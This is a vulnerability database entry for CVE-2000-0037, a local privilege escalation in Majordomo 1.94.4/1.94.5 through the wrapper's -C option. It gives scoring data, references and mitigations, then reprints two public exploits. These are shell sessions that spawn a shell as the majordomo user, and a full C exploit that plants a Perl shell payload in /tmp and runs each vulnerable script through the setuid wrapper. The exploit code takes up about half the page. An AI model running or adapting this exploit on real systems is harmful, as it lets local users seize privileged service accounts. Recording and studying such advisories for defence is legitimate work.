CVE-2000-0037
CVSS 4.6
Published: 1999-12-28 00:00:00
Revised: 2016-10-17 22:06:16

[Original] Majordomo wrapper allows local users to gain privileges by specifying an alternate configuration file.


[CNNVD] Majordomo Local -C Parameter Vulnerability (CNNVD-199912-094)

        A vulnerability in the Majordomo package allows local users to gain privileges by specifying an alternate configuration file.
        

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may lead to system files being modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

cpe:/a:great_circle_associates:majordomo:1.94.4
cpe:/a:great_circle_associates:majordomo:1.94.5

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0037
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0037
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-094
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=94780294009285&w=2
(UNKNOWN)  BUGTRAQ  20000113 Info on some security holes reported against SCO Unixware.
http://www.redhat.com/support/errata/RHSA-2000-005.html
(UNKNOWN)  REDHAT  RHSA-2000:005
http://www.securityfocus.com/bid/903
(UNKNOWN)  BID  903

- Vulnerability information

Majordomo Local -C Parameter Vulnerability
Medium  Input validation
1999-12-28 00:00:00 2005-05-02 00:00:00
Local
        A vulnerability in the Majordomo package allows local users to gain privileges by specifying an alternate configuration file.
        

- Advisories and patches

        A temporary solution is to chmod o-x the majordomo binary. This will prevent users who are not in group majordomo from executing it.
        It is easily possible to remove all interactive access to all the pieces of the majordomo software, even if you are using smrsh, without modifying the majordomo software itself:
        * set the group id in majordomo's makefile to group 'mail' (assuming you're the same as RedHat and mail is delivered as mail.mail on your o/s - check it with a script that runs 'id')
        * remove world r-x on majordomo's home dir and its contents
        * remove world r-x on the list dir and its contents
        * still have the symbolic link to wrapper for smrsh to work if you have that installed with your sendmail
        Great Circle Associates Majordomo 1.94.5
        

- Vulnerability information (19699)

Majordomo 1.94.4/1.94.5 Local -C Parameter Vulnerability (1) (EDBID:19699)
linux local
1999-12-29 Verified
0 Shevek
N/A
source: http://www.securityfocus.com/bid/903/info

A local user can gain the privileges of the majordomo account because the scripts load a user-controlled file as Perl code. The scripts accept a -C option naming an alternate configuration file and load it with Perl's 'require'; when majordomo (or one of several other scripts) is started through the setuid root wrapper, the wrapper passes the option through unchanged, so whatever Perl code the named file contains is executed with majordomo privileges.

The same pattern occurs in several scripts: archive2.pl, bounce-remind, config-test, digest, majordomo, request-answer and resend. medit under bin/, and archive_mh.pl, new-list and sequencer under Tools/, use 'require' in the same way, but since the wrapper only executes scripts found in the majordomo installation directory, they cannot be reached through it.

shevek@tirin ~$ cat foo.pl
system("/bin/csh");
shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom
------

Here's another example (using a different script), posted to Bugtraq by Federico G. Schwindt on May 23, 2000:

$ cat /tmp/myconf
system("/bin/sh");
$ id
uid=1000(fgsch) gid=1000(fgsch) groups=1000(fgsch), 0(wheel), 11(core)
$ ./wrapper bounce-remind -C /tmp/myconf
$ id
uid=41(majordom) gid=41(majordom) groups=1000(fgsch), 0(wheel), 11(core)

- Vulnerability information (19700)

Majordomo 1.94.4/1.94.5 Local -C Parameter Vulnerability (2) (EDBID:19700)
linux local
1999-12-29 Verified
0 morpheus[bd]
N/A
source: http://www.securityfocus.com/bid/903/info

/*
		MAJORDOMO - EXPLOIT FOR LINUX
		    tested up to v1.94.5
		  written by Morpheus

    The exploit relies on the flawed use of Majordomo scripts. By default
    the exploit uses the "bounce-remind" script. On success the exploit
    delivers a shell with uid and gid set to those of the Majordomo
    wrapper.
    The exploit was tested on SuSE Linux 6.0 / 6.3 (CeBIT version).

    To compile the exploit:

    	gcc major.c -o major

    To use the exploit:

    If the exploit is called <major>, just run ./major. That should be
    enough. If no shell is started, look at the error messages. Either the
    Majordomo version is not "compatible" or the Majordomo script is not
    present. Then either run ./major auto, so that the exploit tries all
    vulnerable scripts, or run ./major <script>, where <script> is to be
    replaced by a vulnerable Majordomo script. For the help screen, just
    run ./major -h.


    Written by Morpheus [BrightDarkness] '00
    URL:  www.brightdarkness.de
    Mail: morpheusbd@gmx.net


    This bug in Majordomo was not discovered by me. I only wrote the
    exploit for it.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define MAJORDOMO	"/usr/lib/majordomo/wrapper"
#define SHELL 		"system(\"/bin/sh\")"
#define MORPHEUS	"/tmp/morpheus"
#define WRAPPER		"wrapper"

void intro(void);
void usage(char *arg);

/* Scripts that 'require' the file named by -C (see the description above). */
static const char *const skripte[] = {
    "bounce-remind", "archive2.pl", "config-test", "digest",
    "majordomo", "request-answer", "resend"
};
#define NSKRIPTE (sizeof skripte / sizeof skripte[0])

/* Start the wrapper on one script with "-C /tmp/morpheus". execl() only
 * returns if the wrapper itself could not be started. */
static void run_wrapper(const char *skript)
{
    printf("using : %s\n", skript);
    if (execl(MAJORDOMO, WRAPPER, skript, "-C", MORPHEUS, (char *)NULL) == -1)
        perror("EXECL");
}

int main(int argc, char **argv)
  {
    char skript[30];
    int file;

    if ((argc == 2) && (strcmp(argv[1], "-h") == 0))
      usage(argv[0]);

    /* Bound the copy by the buffer size (the original used strlen() of the
     * uninitialised buffer as the limit). */
    if (argc == 2)
      {
        strncpy(skript, argv[1], sizeof skript - 1);
        skript[sizeof skript - 1] = '\0';
      }
    else
      strcpy(skript, "bounce-remind");

    /* The "configuration file" the wrapper hands to the script: one line
     * of Perl that the script's 'require' executes as the majordomo user. */
    if ((file = open(MORPHEUS, O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0)
      {
        perror(MORPHEUS);
        exit(1);
      }
    if (write(file, SHELL, strlen(SHELL)) != (ssize_t)strlen(SHELL))
      {
        perror(MORPHEUS);
        exit(1);
      }
    close(file);

    intro();
    if (strcmp(skript, "auto") == 0)
      {
        /* Run each script in a child so the loop goes on after the wrapper
         * exits; an exec in the parent would end the loop at the first
         * script the wrapper accepts. */
        for (size_t i = 0; i < NSKRIPTE; i++)
          {
            pid_t pid = fork();
            if (pid < 0)
              {
                perror("fork");
                exit(1);
              }
            if (pid == 0)
              {
                run_wrapper(skripte[i]);
                _exit(1);
              }
            waitpid(pid, NULL, 0);
          }
      }
    else
      run_wrapper(skript);
    return 0;
  }

void intro(void)
  {
    printf("\033[2J\033[1;1H");
    printf("\033[1;33mExploit code for Majordomo Wrapper <= v1.94.5\n");
    printf("\033[1;32mWritten by Morpheus [BrightDarkness] '00\n");
    printf("\033[1;31mURL:  \033[1;32mwww.brightdarkness.de\n");
    printf("\033[1;31mmail: \033[1;32mmorpheusbd@gmx.net\n");
    printf("\033[0;29m");
  }

void usage(char *arg)
  {
    intro();
    printf("\033[1;34m");
    printf("Help for this program :\n");
    printf("Usage : %s -h           Help screen\n", arg);
    printf("        %s auto         Trying all scripts automatically\n", arg);
    printf("        %s <scriptname> Tries just this <script>\n", arg);
    printf("\033[0;29m");
    exit(0);
  }

- Vulnerability information

1181
Majordomo -C Parameter Local Privilege Escalation
Local Access Required  Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

1999-12-28 Unknown
1999-12-28 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of MITRE; their official data sources are kept on MITRE's websites.